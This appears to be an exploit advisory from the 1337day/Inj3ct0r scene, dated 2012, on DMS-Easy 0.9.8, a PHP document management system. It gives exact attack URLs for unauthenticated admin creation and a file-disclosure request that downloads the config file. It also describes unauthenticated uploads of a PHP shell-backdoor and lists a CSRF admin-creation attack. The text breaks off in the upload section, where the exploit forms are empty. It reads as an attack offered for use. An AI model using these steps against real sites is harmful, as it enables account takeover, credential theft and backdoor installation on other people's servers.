1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 0 [x] Official Website: http://www.1337day.com 1 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0 0 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <<<:>>> CMS DMS-Easy - Multiple Vulnerability <<<:>>> xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : CMS DMS-Easy - Multiple Vulnerability ./CMS Version : DMSEasy0.9.8 (Last Version). ./Software Link : http://sourceforge.net/projects/dms-easy/ ./Author Exploit: [ TheCyberNuxbie ] ./Security Risk : [ Critical Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Time & Date : June, 22 2012. 06:27 PM. ./System Tested : Windows 7 Ultimate, Firefox 9.0.1, Xampp-win32-1.7.3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################ # - POC: # 1.1 Exploit - Local Add Admin. # 1.2 Exploit - Remote File Disclosure. # 1.3 Exploit - Multiple Arbitrary File Upload. # 1.4 Exploit - CSRF (Add Admin). ############################################################################# # # - Information Details: # DMS-Easy is a web-based Document Management System (DMS) written in PHP5 with MySQL backend. # The most excited feature is it enable you build Tree-based documents on-line very easily, # and the F-Exploer use a directory tree to manage files, # it enable you create/delete/copy/rename/upload files in it. # In DMS-Easy, you can change color as your pleases. # For more information and support: http://www.dmseasy.com/ # ############################################################################# # # 1.1 Exploit - Local Add Admin: # # - Security Risk High...!!! # All Users (not registered) Allowed Create New Admin (Administrator Level). # - Go To: http://dmseasy/front/user_add.php (file not protected) # # View User List: http://dmseasy/front/user_list.php # Attacker allow remove other admin @user_list. # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # 1.2 Exploit - Remote File Disclosure: # # - Remote File Disclosure (download config file): # http://dmseasy/front/downloadfile.php?file=dmseasy/common/config.php # # Vuln: ../dmseasy/front/downloadFile.php Line 5. # CODE: $filename = $_SERVER["DOCUMENT_ROOT"] . "/" . get("file"); # # [ End Of Code ] # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # 1.3 Exploit - Multiple Arbitrary File Upload: # # 1.3.1 Arbitrary File Upload (upload_1.php) & (upload_2.php): # # - Security Risk High...!!! # All Users (not registered) Allowed upload all ext files. # Attacker allow upload shell-backdoor.php (frontend). # # http://dmseasy/upload/upload_1.php <--- Vuln. # http://dmseasy/upload/upload_2.php <--- Vuln. # # (upload_1.php) # # # (upload_2.php) # #
# #